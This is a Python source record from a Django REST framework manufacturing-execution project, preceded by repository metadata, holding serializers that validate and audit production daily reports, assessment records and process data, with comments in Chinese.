serializer_class = AnswerSerializer
def get_permissions(self):
if self.request.method in ['PUT', 'PATCH', 'DELETE']:
return [IsAdminUser()]
return permissions_func
# # Nested (Category)
# class CategoryProductList(generics.ListAPIView):
# permission_classes = permissions
# throttle_classes = [UserRateThrottle]
# queryset = Product.objects.all()
# serializer_class = ProductSerializer
# lookup_url_kwarg = 'cat'
# def get_queryset(self):
# return self.queryset.filter(
# category_id=self.kwargs.get('cat'),
# category__is_active=True,
# is_active=True
# )
# @method_decorator(caching)
# def get(self, request, *args, **kwargs):
# return self.list(request, *args, **kwargs)
# # Nested (Subject)
# class SubjectProductList(generics.ListAPIView):
# permission_classes = permissions
# throttle_classes = [UserRateThrottle]
# queryset = Product.objects.all()
# serializer_class = ProductSerializer
# lookup_url_kwarg = 'sub'
# def get_queryset(self):
# return self.queryset.filter(
# subject_id=self.kwargs.get('sub'),
# subject__is_active=True,
# is_active=True
# )
# @method_decorator(caching)
# def get(self, request, *args, **kwargs):
# return self.list(request, *args, **kwargs)
# # Nested (Category Subject)
# class CategorySubjectProductList(generics.ListAPIView):
# permission_classes = permissions
# throttle_classes = [UserRateThrottle]
# queryset = Product.objects.all()
# serializer_class = ProductSerializer
# lookup_url_kwarg = 'cat'
# def get_queryset(self):
# return self.queryset.filter(
# category_id=self.kwargs.get('cat'),
# category__is_active=True,
# subject_id=self.kwargs.get('sub'),
# subject__is_active=True,
# is_active=True
# )
# @method_decorator(caching)
# def get(self, request, *args, **kwargs):
# return self.list(request, *args, **kwargs)
| 30.713483 | 89 | 0.648253 | 1,182 | 10,934 | 5.796108 | 0.114213 | 0.019267 | 0.044665 | 0.057802 | 0.860458 | 0.860458 | 0.860458 | 0.860458 | 0.854328 | 0.854328 | 0 | 0.001932 | 0.242546 | 10,934 | 355 | 90 | 30.8 | 0.825284 | 0.190964 | 0 | 0.893401 | 0 | 0 | 0.020496 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.101523 | false | 0 | 0.050761 | 0.040609 | 0.538071 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
11d9d8acbea685509f80c0aea42bbad5e2532ab7 | 44,896 | py | Python | apps/production/serializes/recording_serialize.py | kane-zh/MES_server | d8d28768a054eee6433e3900908afd331fd92281 | [
"Apache-2.0"
] | null | null | null | apps/production/serializes/recording_serialize.py | kane-zh/MES_server | d8d28768a054eee6433e3900908afd331fd92281 | [
"Apache-2.0"
] | null | null | null | apps/production/serializes/recording_serialize.py | kane-zh/MES_server | d8d28768a054eee6433e3900908afd331fd92281 | [
"Apache-2.0"
] | null | null | null | from rest_framework import serializers
from apps.production.serializes.basicinfor_serialize import *
from apps.production.models.recording_model import *
from apps.process.models.basicinfor_model import *
from apps.plan.models.basicinfor_model import *
from commonFunction import *
from django.contrib.auth import get_user_model
from Mes import settings
User = get_user_model()
# region Assessment record definition serializers
class AssessmentRecordSerialize_Create(serializers.ModelSerializer):
"""
考核信息定义--create
"""
state = serializers.HiddenField(default="新建")
create_user = serializers.HiddenField(default=serializers.CurrentUserDefault())
class Meta:
model = AssessmentRecordModel
fields = ("id", "name", "code", "state","type","personnel","level","dataTime",
"attribute1", "attribute2", "attribute3", "attribute4","attribute5",
"image", "file","desc", "auditor", "create_user"
)
    # Validate all fields
    def validate(self, attrs):
        if not attrs["create_user"].has_perm('production.add_assessmentrecordmodel'):  # current user lacks create permission
            raise serializers.ValidationError("当前用户不具备创建权限'")
        if settings.SAME_USER != True:
            if attrs["create_user"].username == attrs["auditor"]:  # auditor account must differ from creator account
                raise serializers.ValidationError("审核帐号不能与创建帐号相同'")
        return attrs
    # Validate the auditor field
    def validate_auditor(self, value):
        try:
            auditor = User.objects.get(username=value)
        except Exception as e:
            raise serializers.ValidationError("指定的审核账号不存在")
        if not auditor.has_perm('production.admin_assessmentrecordmodel'):
            raise serializers.ValidationError("指定的审核账号不具备审核权限")
        return value
    # Validate the type field
    def validate_type(self, value):
        list = AssessmentTypeDefinitionModel.objects.get(id=value.id)
        if list is None:  # check that the referenced type exists
            raise serializers.ValidationError("指定的类型不存在")
        elif (list.state != "使用中"):  # check that the type is in the in-use state
            raise serializers.ValidationError("指定的类型不在--'使用状态'")
        return value
    # Validate the level field
    def validate_level(self, value):
        list = AssessmentLevelDefinitionModel.objects.get(id=value.id)
        if list is None:  # check that the referenced level exists
            raise serializers.ValidationError("指定的等级不存在")
        elif (list.state != "使用中"):  # check that the level is in the in-use state
            raise serializers.ValidationError("指定的等级不在--'使用状态'")
        return value
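# Minimal usage sketch for the create serializer above (hypothetical view code;
# the `request` object is an assumption, not part of this module):
#     serializer = AssessmentRecordSerialize_Create(
#         data=request.data, context={'request': request})
#     serializer.is_valid(raise_exception=True)
#     serializer.save()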
class AssessmentRecordSerialize_List(serializers.ModelSerializer):
"""
考核信息定义--list
"""
type = AssessmentTypeDefinitionSerialize_List(required=False)
personnel=PersonnelInforDefinitionSerialize_List()
class Meta:
model = AssessmentRecordModel
fields = ("id", "name", "code", "state","type","personnel","dataTime", "auditor", "create_user","create_time","update_time"
)
class AssessmentRecordSerialize_Retrieve(serializers.ModelSerializer):
"""
考核信息定义--retrieve
"""
image =ProductionImageSerialize_List(many=True)
file =ProductionFileSerialize_List(many=True)
alter =ProductionAlterRecordSerialize_List(many=True)
type = AssessmentTypeDefinitionSerialize_List(required=False)
personnel=PersonnelInforDefinitionSerialize_List()
level = AssessmentLevelDefinitionSerialize_List()
class Meta:
model = AssessmentRecordModel
fields = "__all__"
class AssessmentRecordSerialize_Update(serializers.ModelSerializer):
"""
考核信息定义--update
"""
class Meta:
model = AssessmentRecordModel
fields = ("id", "name", "code", "type","personnel","level","dataTime",
"attribute1", "attribute2", "attribute3", "attribute4","attribute5",
"image", "file","desc", "auditor"
)
    # Validate all fields
    def validate(self, attrs):
        if self.instance.state != '新建':  # edits are only allowed while still in the '新建' (new) state
            raise serializers.ValidationError("当前信息已提交,禁止更改")
        return attrs
    # Validate the auditor field
    def validate_auditor(self, value):
        if self.instance.state != '新建':  # this field may only change in the '新建' (new) state
            raise serializers.ValidationError("当前信息已提交,禁止更改")
        if settings.SAME_USER != True:
            if self.instance.create_user == value:  # auditor account must differ from creator account
                raise serializers.ValidationError("审核帐号不能与创建帐号相同'")
        try:
            auditor = User.objects.get(username=value)
        except Exception as e:
            raise serializers.ValidationError("指定的审核账号不存在")
        if not auditor.has_perm('production.admin_assessmentrecordmodel'):
            raise serializers.ValidationError("指定的审核账号不具备审核权限")
        return value
    # Validate the type field
    def validate_type(self, value):
        if self.instance.state != '新建':  # this field may only change in the '新建' (new) state
            raise serializers.ValidationError("当前信息已提交,禁止更改")
        list = AssessmentTypeDefinitionModel.objects.get(id=value.id)
        if list is None:  # check that the referenced type exists
            raise serializers.ValidationError("指定的类型不存在")
        elif (list.state != "使用中"):  # check that the type is in the in-use state
            raise serializers.ValidationError("指定的类型不在--'使用状态'")
        return value
    # Validate the level field
    def validate_level(self, value):
        if self.instance.state != '新建':  # this field may only change in the '新建' (new) state
            raise serializers.ValidationError("当前信息已提交,禁止更改")
        list = AssessmentLevelDefinitionModel.objects.get(id=value.id)
        if list is None:  # check that the referenced level exists
            raise serializers.ValidationError("指定的等级不存在")
        elif (list.state != "使用中"):  # check that the level is in the in-use state
            raise serializers.ValidationError("指定的等级不在--'使用状态'")
        return value
class AssessmentRecordSerialize_Partial(serializers.ModelSerializer):
"""
考核信息定义--partial
"""
class Meta:
model = AssessmentRecordModel
fields = ("id", "state", "alter")
    # Validate all fields
    def validate(self, attrs):
        try:
            del attrs['alter']  # drop the alter field
        except Exception:
            pass
        return attrs
    # Validate the state field
    def validate_state(self, value):
        validate_states1(self.instance.state, value)
        if ((self.instance.create_user == self.context['request'].user.username) and
                (self.instance.auditor != self.context['request'].user.username)):  # current user is the creator but not the auditor
            if not (self.instance.state == "新建" and (value == "审核中" or value == "作废")):
                raise serializers.ValidationError("创建者只能将[新建]信息更改成[审核中]或[作废]")
        return value
    # Validate the alteration-record field
    def validate_alter(self, value):
        obj = AssessmentRecordModel.objects.get(id=self.instance.id).alter
        for data in value:
            obj.add(data.id)
        return value
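# Illustrative PATCH body for the partial serializer above (the state values are
# the ones this module checks against; the alter ids are made up):
#     {"state": "审核中", "alter": [1, 2]}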
# endregion
# region Product production daily-report item serializers
class ProductDailyReportItemSerialize_Create(serializers.ModelSerializer):
"""
产品生产日报子项定义--create
"""
create_user = serializers.HiddenField(default=serializers.CurrentUserDefault())
class Meta:
model = ProductDailyReportItemModel
fields = ("id", "handler","producttask_code","product_id", "all_sum", "ok_sum", "ng_sum",
"attribute1","attribute2","attribute3","attribute4","attribute5","image","file","desc","create_user")
    # Validate all fields
    def validate(self, attrs):
        try:
            product = ProductInforDefinitionModel.objects.get(id=attrs["product_id"])  # check that the specified product exists
        except Exception as e:
            raise serializers.ValidationError("指定的产品不存在")
        if product.state != "使用中":
            raise serializers.ValidationError("指定的产品不在'使用中'状态")
        if 'producttask_code' in attrs.keys():
            if attrs['producttask_code'] != '':
                try:
                    task = ProductTaskCreateModel.objects.get(code=attrs["producttask_code"])  # check that the specified production task exists
                except Exception as e:
                    raise serializers.ValidationError("指定的生产任务不存在")
                if (task.state != "使用中"):  # check the task state
                    raise serializers.ValidationError("指定的生产任务不在--'使用状态'")
                attrs["producttask_name"] = task.name  # production task name
        attrs["productType_code"] = product.type.code  # product type code
        attrs["productType_name"] = product.type.name  # product type name
        attrs["product_code"] = product.code  # product code
        attrs["product_name"] = product.name  # product name
        return attrs
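# Illustrative input for this item serializer (all values are made up; field
# names follow the Meta.fields list above):
#     {"handler": "operator-01", "producttask_code": "PT-001", "product_id": 1,
#      "all_sum": 100, "ok_sum": 98, "ng_sum": 2}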
class ProductDailyReportItemSerialize_List(serializers.ModelSerializer):
"""
产品生产日报子项定义--list
"""
image = ProductionImageSerialize_List(many=True)
file = ProductionFileSerialize_List(many=True)
class Meta:
model = ProductDailyReportItemModel
fields = "__all__"
# endregion
# region Product production daily report serializers
class ProductDailyReportSerialize_Create(serializers.ModelSerializer):
"""
产品生产日报定义--create
"""
state = serializers.HiddenField(default="新建")
create_user = serializers.HiddenField(default=serializers.CurrentUserDefault())
class Meta:
model = ProductDailyReportModel
fields = ("id", "name", "code", "state", "team", "child","attribute1", "attribute2","attribute3", "attribute4", "attribute5",
"image", "file","dataTime","desc", "auditor", "create_user")
    # Validate all fields
    def validate(self, attrs):
        if not attrs["create_user"].has_perm('production.add_productdailyreportmodel'):  # current user lacks create permission
            raise serializers.ValidationError("当前用户不具备创建权限'")
        if settings.SAME_USER != True:
            if attrs["create_user"].username == attrs["auditor"]:  # auditor account must differ from creator account
                raise serializers.ValidationError("审核帐号不能与创建帐号相同'")
        attrs["workshop_code"] = attrs["team"].type.code  # workshop code
        attrs["workshop_name"] = attrs["team"].type.name  # workshop name
        return attrs
    # Validate the auditor field
    def validate_auditor(self, value):
        try:
            auditor = User.objects.get(username=value)
        except Exception as e:
            raise serializers.ValidationError("指定的审核账号不存在")
        if not auditor.has_perm('production.admin_productdailyreportmodel'):
            raise serializers.ValidationError("指定的审核账号不具备审核权限")
        return value
    # Validate the team field
    def validate_team(self, value):
        list = TeamInforDefinitionModel.objects.get(id=value.id)
        if list is None:  # check that the referenced team exists
            raise serializers.ValidationError("指定的班组不存在")
        elif (list.state != "使用中"):  # check that the team is in the in-use state
            raise serializers.ValidationError("指定的班组不在--'使用状态'")
        return value
class ProductDailyReportSerialize_List(serializers.ModelSerializer):
"""
产品生产日报定义--list
"""
team=TeamInforDefinitionSerialize_List(required=False)
class Meta:
model = ProductDailyReportModel
fields = ("id", "name", "code","team","workshop_code","workshop_name", "state", "dataTime",
"auditor", "create_user","create_time","update_time")
class ProductDailyReportSerialize_Retrieve(serializers.ModelSerializer):
"""
产品生产日报定义--retrieve
"""
image = ProductionImageSerialize_List(many=True)
file = ProductionFileSerialize_List(many=True)
alter = ProductionAlterRecordSerialize_List(many=True)
team = TeamInforDefinitionSerialize_List(required=False)
child =ProductDailyReportItemSerialize_List(many=True)
class Meta:
model = ProductDailyReportModel
fields = "__all__"
class ProductDailyReportSerialize_Update(serializers.ModelSerializer):
"""
产品生产日报定义--update
"""
class Meta:
model = ProductDailyReportModel
fields = ("id", "name", "code", "team", "child","attribute1", "attribute2","attribute3", "attribute4", "attribute5", "image",
"file","dataTime","desc", "auditor")
    # Validate all fields
    def validate(self, attrs):
        if self.instance.state != '新建':  # edits are only allowed while still in the '新建' (new) state
            raise serializers.ValidationError("当前信息已提交,禁止更改")
        return attrs
    # Validate the auditor field
    def validate_auditor(self, value):
        if self.instance.state != '新建':  # this field may only change in the '新建' (new) state
            raise serializers.ValidationError("当前信息已提交,禁止更改")
        if settings.SAME_USER != True:
            if self.instance.create_user == value:  # auditor account must differ from creator account
                raise serializers.ValidationError("审核帐号不能与创建帐号相同'")
        try:
            auditor = User.objects.get(username=value)
        except Exception as e:
            raise serializers.ValidationError("指定的审核账号不存在")
        if not auditor.has_perm('production.admin_productdailyreportmodel'):
            raise serializers.ValidationError("指定的审核账号不具备审核权限")
        return value
    # Validate the team field
    def validate_team(self, value):
        if self.instance.state != '新建':  # this field may only change in the '新建' (new) state
            raise serializers.ValidationError("当前信息已提交,禁止更改")
        list = TeamInforDefinitionModel.objects.get(id=value.id)
        if list is None:  # check that the referenced team exists
            raise serializers.ValidationError("指定的班组不存在")
        elif (list.state != "使用中"):  # check that the team is in the in-use state
            raise serializers.ValidationError("指定的班组不在--'使用状态'")
        return value
class ProductDailyReportSerialize_Partial(serializers.ModelSerializer):
"""
产品生产日报定义--partial
"""
class Meta:
model = ProductDailyReportModel
fields = ("id", "state", "alter")
    # Validate all fields
    def validate(self, attrs):
        try:
            del attrs['alter']  # drop the alter field
        except Exception:
            pass
        return attrs
    # Validate the state field
    def validate_state(self, value):
        validate_states1(self.instance.state, value)
        if (self.instance.create_user == self.context['request'].user.username) and \
                (self.instance.auditor != self.context['request'].user.username):  # current user is the creator but not the auditor
            if not (self.instance.state == "新建" and (value == "审核中" or value == "作废")):
                raise serializers.ValidationError("创建者只能将[新建]信息更改成[审核中]或[作废]")
        return value
    # Validate the alteration-record field
    def validate_alter(self, value):
        obj = ProductDailyReportModel.objects.get(id=self.instance.id).alter
        for data in value:
            obj.add(data.id)
        return value
# endregion
# region Semifinished production daily-report item serializers
class SemifinishedDailyReportItemSerialize_Create(serializers.ModelSerializer):
"""
半成品生产日报子项定义--create
"""
create_user = serializers.HiddenField(default=serializers.CurrentUserDefault())
class Meta:
model = SemifinishedDailyReportItemModel
fields = ("id", "handler","producttask_code", "semifinished_id", "all_sum", "ok_sum", "ng_sum",
"attribute1","attribute2","attribute3","attribute4","attribute5","image","file","desc","create_user")
    # Validate all fields
    def validate(self, attrs):
        try:
            semifinished = SemifinishedInforDefinitionModel.objects.get(id=attrs["semifinished_id"])  # check that the specified semifinished product exists
        except Exception as e:
            raise serializers.ValidationError("指定的半成品不存在")
        if semifinished.state != "使用中":
            raise serializers.ValidationError("指定的半成品不在'使用中'状态")
        if 'producttask_code' in attrs.keys():
            if attrs['producttask_code'] != '':
                try:
                    task = ProductTaskCreateModel.objects.get(code=attrs["producttask_code"])  # check that the specified production task exists
                except Exception as e:
                    raise serializers.ValidationError("指定的生产任务不存在")
                if (task.state != "使用中"):  # check the task state
                    raise serializers.ValidationError("指定的生产任务不在--'使用状态'")
                attrs["producttask_name"] = task.name  # production task name
        attrs["semifinishedType_code"] = semifinished.type.code  # semifinished type code
        attrs["semifinishedType_name"] = semifinished.type.name  # semifinished type name
        attrs["semifinished_code"] = semifinished.code  # semifinished code
        attrs["semifinished_name"] = semifinished.name  # semifinished name
        return attrs
class SemifinishedDailyReportItemSerialize_List(serializers.ModelSerializer):
"""
半成品生产日报子项定义--list
"""
image = ProductionImageSerialize_List(many=True)
file = ProductionFileSerialize_List(many=True)
class Meta:
model = SemifinishedDailyReportItemModel
fields = "__all__"
# endregion
# region Semifinished production daily report serializers
class SemifinishedDailyReportSerialize_Create(serializers.ModelSerializer):
"""
半成品生产日报定义--create
"""
state = serializers.HiddenField(default="新建")
create_user = serializers.HiddenField(default=serializers.CurrentUserDefault())
class Meta:
model = SemifinishedDailyReportModel
fields = ("id", "name", "code", "state", "team", "child","attribute1", "attribute2","attribute3", "attribute4", "attribute5",
"image", "file","dataTime","desc", "auditor", "create_user")
    # Validate all fields
    def validate(self, attrs):
        if not attrs["create_user"].has_perm('production.add_semifinisheddailyreportmodel'):  # current user lacks create permission
            raise serializers.ValidationError("当前用户不具备创建权限'")
        if settings.SAME_USER != True:
            if attrs["create_user"].username == attrs["auditor"]:  # auditor account must differ from creator account
                raise serializers.ValidationError("审核帐号不能与创建帐号相同'")
        attrs["workshop_code"] = attrs["team"].type.code  # workshop code
        attrs["workshop_name"] = attrs["team"].type.name  # workshop name
        return attrs
    # Validate the auditor field
    def validate_auditor(self, value):
        try:
            auditor = User.objects.get(username=value)
        except Exception as e:
            raise serializers.ValidationError("指定的审核账号不存在")
        if not auditor.has_perm('production.admin_semifinisheddailyreportmodel'):
            raise serializers.ValidationError("指定的审核账号不具备审核权限")
        return value
    # Validate the team field
    def validate_team(self, value):
        list = TeamInforDefinitionModel.objects.get(id=value.id)
        if list is None:  # check that the referenced team exists
            raise serializers.ValidationError("指定的班组不存在")
        elif (list.state != "使用中"):  # check that the team is in the in-use state
            raise serializers.ValidationError("指定的班组不在--'使用状态'")
        return value
class SemifinishedDailyReportSerialize_List(serializers.ModelSerializer):
"""
半成品生产日报定义--list
"""
team=TeamInforDefinitionSerialize_List(required=False)
class Meta:
model = SemifinishedDailyReportModel
fields = ("id", "name", "code","team","workshop_code","workshop_name","state", "dataTime",
"auditor", "create_user","create_time","update_time"
)
class SemifinishedDailyReportSerialize_Retrieve(serializers.ModelSerializer):
"""
半成品生产日报定义--retrieve
"""
image = ProductionImageSerialize_List(many=True)
file = ProductionFileSerialize_List(many=True)
alter = ProductionAlterRecordSerialize_List(many=True)
team = TeamInforDefinitionSerialize_List(required=False)
child = SemifinishedDailyReportItemSerialize_List(many=True)
class Meta:
model = SemifinishedDailyReportModel
fields = "__all__"
class SemifinishedDailyReportSerialize_Update(serializers.ModelSerializer):
"""
半成品生产日报定义--update
"""
class Meta:
model = SemifinishedDailyReportModel
fields = ("id", "name", "code", "team", "child","attribute1", "attribute2","attribute3", "attribute4", "attribute5",
"image", "file","dataTime","desc", "auditor")
    # Validate all fields
    def validate(self, attrs):
        if self.instance.state != '新建':  # edits are only allowed while still in the '新建' (new) state
            raise serializers.ValidationError("当前信息已提交,禁止更改")
        return attrs
    # Validate the auditor field
    def validate_auditor(self, value):
        if self.instance.state != '新建':  # this field may only change in the '新建' (new) state
            raise serializers.ValidationError("当前信息已提交,禁止更改")
        if settings.SAME_USER != True:
            if self.instance.create_user == value:  # auditor account must differ from creator account
                raise serializers.ValidationError("审核帐号不能与创建帐号相同'")
        try:
            auditor = User.objects.get(username=value)
        except Exception as e:
            raise serializers.ValidationError("指定的审核账号不存在")
        if not auditor.has_perm('production.admin_semifinisheddailyreportmodel'):
            raise serializers.ValidationError("指定的审核账号不具备审核权限")
        return value
    # Validate the team field
    def validate_team(self, value):
        if self.instance.state != '新建':  # this field may only change in the '新建' (new) state
            raise serializers.ValidationError("当前信息已提交,禁止更改")
        list = TeamInforDefinitionModel.objects.get(id=value.id)
        if list is None:  # check that the referenced team exists
            raise serializers.ValidationError("指定的班组不存在")
        elif (list.state != "使用中"):  # check that the team is in the in-use state
            raise serializers.ValidationError("指定的班组不在--'使用状态'")
        return value
class SemifinishedDailyReportSerialize_Partial(serializers.ModelSerializer):
"""
半成品生产日报定义--partial
"""
class Meta:
model = SemifinishedDailyReportModel
fields = ("id", "state", "alter")
    # Validate all fields
    def validate(self, attrs):
        try:
            del attrs['alter']  # drop the alter field
        except Exception:
            pass
        return attrs
    # Validate the state field
    def validate_state(self, value):
        validate_states1(self.instance.state, value)
        if (self.instance.create_user == self.context['request'].user.username) and \
                (self.instance.auditor != self.context['request'].user.username):  # current user is the creator but not the auditor
            if not (self.instance.state == "新建" and (value == "审核中" or value == "作废")):
                raise serializers.ValidationError("创建者只能将[新建]信息更改成[审核中]或[作废]")
        return value
# 审核记录字段验证
def validate_alter(self, value):
obj = SemifinishedDailyReportModel.objects.get(id=self.instance.id).alter
for data in value:
obj.add(data.id)
return value
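# Illustrative sketch (not part of the original module; the URL pattern is an
# assumption): state changes arrive through this Partial serializer as PATCH
# requests carrying only the new state, e.g.
#
#     PATCH /semifinisheddailyreport/<id>/   {"state": "审核中"}
#
# and validate_state() above checks the transition against the caller's
# creator/auditor role before it is applied.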
# endregion
# region Product process data definition serializers
class ProductDataSerialize_Create(serializers.ModelSerializer):
    """
    Product process data definition--create
    """
    state = serializers.HiddenField(default="新建")
    create_user = serializers.HiddenField(default=serializers.CurrentUserDefault())
    class Meta:
        model = ProductDataDefinitionModel
        fields = ("id", "state", "type", "task_id", "product_id", "station_id", "batch", "sn", "handler", "sum", "personnel", "equipment", "material", "station", "quality", "dataTime",
                  "attribute1", "attribute2", "attribute3", "attribute4", "attribute5", "attribute6", "attribute7", "attribute8", "attribute9", "attribute10",
                  "attribute11", "attribute12", "attribute13", "attribute14", "attribute15", "attribute16", "attribute17", "attribute18", "attribute19", "attribute20",
                  "image", "file", "desc", "create_user")
    # Whole-record validation
    def validate(self, attrs):
        if not attrs["create_user"].has_perm('production.add_productdatadefinitionmodel'):  # the current user lacks create permission
            raise serializers.ValidationError("The current user does not have create permission")
        if attrs.get('task_id'):  # a task was specified (present and non-empty)
            try:
                task = ProductTaskCreateModel.objects.get(id=attrs["task_id"])  # check the task exists
            except Exception:
                raise serializers.ValidationError("The specified task does not exist")
            if task.state != "使用中":  # check the task is in the '使用中' (in use) state
                raise serializers.ValidationError("The specified production task is not in the 'in use' state")
            attrs["taskType_code"] = task.type.code  # copy the task type code
            attrs["taskType_name"] = task.type.name  # copy the task type name
            attrs["task_code"] = task.code  # copy the task code
            attrs["task_name"] = task.name  # copy the task name
        if attrs.get('product_id'):  # a product was specified (present and non-empty)
            try:
                product = ProductInforDefinitionModel.objects.get(id=attrs["product_id"])  # check the product exists
            except Exception:
                raise serializers.ValidationError("The specified product does not exist")
            if product.state != "使用中":  # check the product is in the '使用中' (in use) state
                raise serializers.ValidationError("The specified product is not in the 'in use' state")
            attrs["productType_code"] = product.type.code  # copy the product type code
            attrs["productType_name"] = product.type.name  # copy the product type name
            attrs["product_code"] = product.code  # copy the product code
            attrs["product_name"] = product.name  # copy the product name
        if attrs.get('station_id'):  # a station was specified (present and non-empty)
            if not attrs.get('product_id'):  # a station may only be given together with a product
                raise serializers.ValidationError("A station cannot be specified without a product")
            try:
                station = StationInforDefinitionModel.objects.get(id=attrs["station_id"])  # check the station exists
            except Exception:
                raise serializers.ValidationError("The specified station does not exist")
            if station.state != "使用中":  # check the station is in the '使用中' (in use) state
                raise serializers.ValidationError("The specified station is not in the 'in use' state")
            attrs["stationType_code"] = station.type.code  # copy the station type code
            attrs["stationType_name"] = station.type.name  # copy the station type name
            attrs["station_code"] = station.code  # copy the station code
            attrs["station_name"] = station.name  # copy the station name
        return attrs
    # Type field validation
    def validate_type(self, value):
        try:
            data_type = ProductDataTypeDefinitionModel.objects.get(id=value.id)  # check the type exists
        except ProductDataTypeDefinitionModel.DoesNotExist:
            raise serializers.ValidationError("The specified type does not exist")
        if data_type.state != "使用中":  # check the type is in the '使用中' (in use) state
            raise serializers.ValidationError("The specified type is not in the 'in use' state")
        return value
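# Illustrative payload sketch (not part of the original module; the values
# are assumptions): task_id, product_id and station_id are plain id strings
# that validate() resolves and denormalises into the *_code / *_name fields,
# so a create request only needs the ids:
#
#     {"type": <type id>, "task_id": "17", "product_id": "42",
#      "station_id": "7", "batch": "B-001", "sum": 100}
#
# Note that station_id is rejected unless a non-empty product_id accompanies it.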
class ProductDataSerialize_Update(serializers.ModelSerializer):
    """
    Product process data definition--update
    """
    class Meta:
        model = ProductDataDefinitionModel
        fields = ("id", "type", "task_id", "product_id", "station_id", "batch", "sn", "handler", "sum", "personnel", "equipment", "material", "station", "quality", "dataTime",
                  "attribute1", "attribute2", "attribute3", "attribute4", "attribute5", "attribute6", "attribute7", "attribute8", "attribute9", "attribute10",
                  "attribute11", "attribute12", "attribute13", "attribute14", "attribute15", "attribute16", "attribute17", "attribute18", "attribute19", "attribute20",
                  "image", "file", "desc",)
    # Whole-record validation
    def validate(self, attrs):
        if self.instance.state != '新建':  # once past the '新建' (new) state, the record can no longer be edited
            raise serializers.ValidationError("The record has already been submitted and can no longer be changed")
        if attrs.get('task_id'):  # a task was specified (present and non-empty)
            try:
                task = ProductTaskCreateModel.objects.get(id=attrs["task_id"])  # check the task exists
            except Exception:
                raise serializers.ValidationError("The specified task does not exist")
            if task.state != "使用中":  # check the task is in the '使用中' (in use) state
                raise serializers.ValidationError("The specified production task is not in the 'in use' state")
            attrs["taskType_code"] = task.type.code  # copy the task type code
            attrs["taskType_name"] = task.type.name  # copy the task type name
            attrs["task_code"] = task.code  # copy the task code
            attrs["task_name"] = task.name  # copy the task name
        if attrs.get('product_id'):  # a product was specified (present and non-empty)
            try:
                product = ProductInforDefinitionModel.objects.get(id=attrs["product_id"])  # check the product exists
            except Exception:
                raise serializers.ValidationError("The specified product does not exist")
            if product.state != "使用中":  # check the product is in the '使用中' (in use) state
                raise serializers.ValidationError("The specified product is not in the 'in use' state")
            attrs["productType_code"] = product.type.code  # copy the product type code
            attrs["productType_name"] = product.type.name  # copy the product type name
            attrs["product_code"] = product.code  # copy the product code
            attrs["product_name"] = product.name  # copy the product name
        if attrs.get('station_id'):  # a station was specified (present and non-empty)
            if not attrs.get('product_id'):  # a station may only be given together with a product
                raise serializers.ValidationError("A station cannot be specified without a product")
            try:
                station = StationInforDefinitionModel.objects.get(id=attrs["station_id"])  # check the station exists
            except Exception:
                raise serializers.ValidationError("The specified station does not exist")
            if station.state != "使用中":  # check the station is in the '使用中' (in use) state
                raise serializers.ValidationError("The specified station is not in the 'in use' state")
            attrs["stationType_code"] = station.type.code  # copy the station type code
            attrs["stationType_name"] = station.type.name  # copy the station type name
            attrs["station_code"] = station.code  # copy the station code
            attrs["station_name"] = station.name  # copy the station name
        return attrs
    # Type field validation
    def validate_type(self, value):
        try:
            data_type = ProductDataTypeDefinitionModel.objects.get(id=value.id)  # check the type exists
        except ProductDataTypeDefinitionModel.DoesNotExist:
            raise serializers.ValidationError("The specified type does not exist")
        if data_type.state != "使用中":  # check the type is in the '使用中' (in use) state
            raise serializers.ValidationError("The specified type is not in the 'in use' state")
        return value
class ProductDataSerialize_List(serializers.ModelSerializer):
    """
    Product process data definition--list
    """
    type = ProductDataTypeDefinitionSerialize_List(required=False)
    class Meta:
        model = ProductDataDefinitionModel
        fields = ("id", "state", "type",
                  "taskType_code", "taskType_name", "task_name", "task_code", "task_id", "productType_code", "productType_name", "product_name", "product_code", "product_id",
                  "stationType_name", "stationType_code", "station_name", "station_code", "station_id", "batch", "handler", "sum", "sn",
                  "personnel", "equipment", "material", "station", "quality", "dataTime", "desc", "create_user")
class ProductDataSerialize_Retrieve(serializers.ModelSerializer):
    """
    Product process data definition--retrieve
    """
    image = ProductionImageSerialize_List(many=True)
    file = ProductionFileSerialize_List(many=True)
    type = ProductDataTypeDefinitionSerialize_List(required=False)
    class Meta:
        model = ProductDataDefinitionModel
        fields = "__all__"
class ProductDataSerialize_Partial(serializers.ModelSerializer):
    """
    Product process data definition--partial
    """
    class Meta:
        model = ProductDataDefinitionModel
        fields = ("id", "state",)
    # Whole-record validation
    def validate(self, attrs):
        if attrs['state'] == "完成":  # the record is being marked as '完成' (finished)
            conditions = {'task_id__iexact': self.instance.task_id,
                          'product_id__iexact': self.instance.product_id,
                          'batch__iexact': self.instance.batch,
                          'station_id__iexact': self.instance.station_id,
                          }
            try:
                station_report = ProductStationReportModel.objects.get(**conditions)  # fetch the matching station work report
                station_report.sum += self.instance.sum  # accumulate the reported quantity
                station_report.save()
            except Exception:
                ProductStationReportModel.objects.create(  # no matching report yet, so create one
                    taskType_code=self.instance.taskType_code,
                    taskType_name=self.instance.taskType_name,
                    task_code=self.instance.task_code,
                    task_name=self.instance.task_name,
                    task_id=self.instance.task_id,
                    productType_code=self.instance.productType_code,
                    productType_name=self.instance.productType_name,
                    product_code=self.instance.product_code,
                    product_name=self.instance.product_name,
                    product_id=self.instance.product_id,
                    stationType_code=self.instance.stationType_code,
                    stationType_name=self.instance.stationType_name,
                    station_code=self.instance.station_code,
                    station_name=self.instance.station_name,
                    station_id=self.instance.station_id,
                    batch=self.instance.batch,
                    sum=self.instance.sum,
                    attribute1=self.instance.attribute1,
                    attribute2=self.instance.attribute2,
                    attribute3=self.instance.attribute3,
                    attribute4=self.instance.attribute4,
                    attribute5=self.instance.attribute5,
                )
        return attrs
    # State field validation
    def validate_state(self, value):
        if self.instance.state == "新建" and value in ("完成", "作废"):
            return value
        if self.instance.state == "完成" and value == "作废":
            return value
        raise serializers.ValidationError("Cannot update the state from " + self.instance.state + " to " + value)
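# Illustrative note (not part of the original module): the transitions allowed
# by validate_state() above form a small one-way state machine,
#
#     新建 (new) --> 完成 (finished) --> 作废 (voided)
#         \_______________________________/
#
# where 新建 may also go straight to 作废, and only the move to 完成 triggers
# the station-report roll-up in validate().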
# endregion
# region Semifinished process data definition serializers
class SemifinishedDataSerialize_Create(serializers.ModelSerializer):
    """
    Semifinished process data definition--create
    """
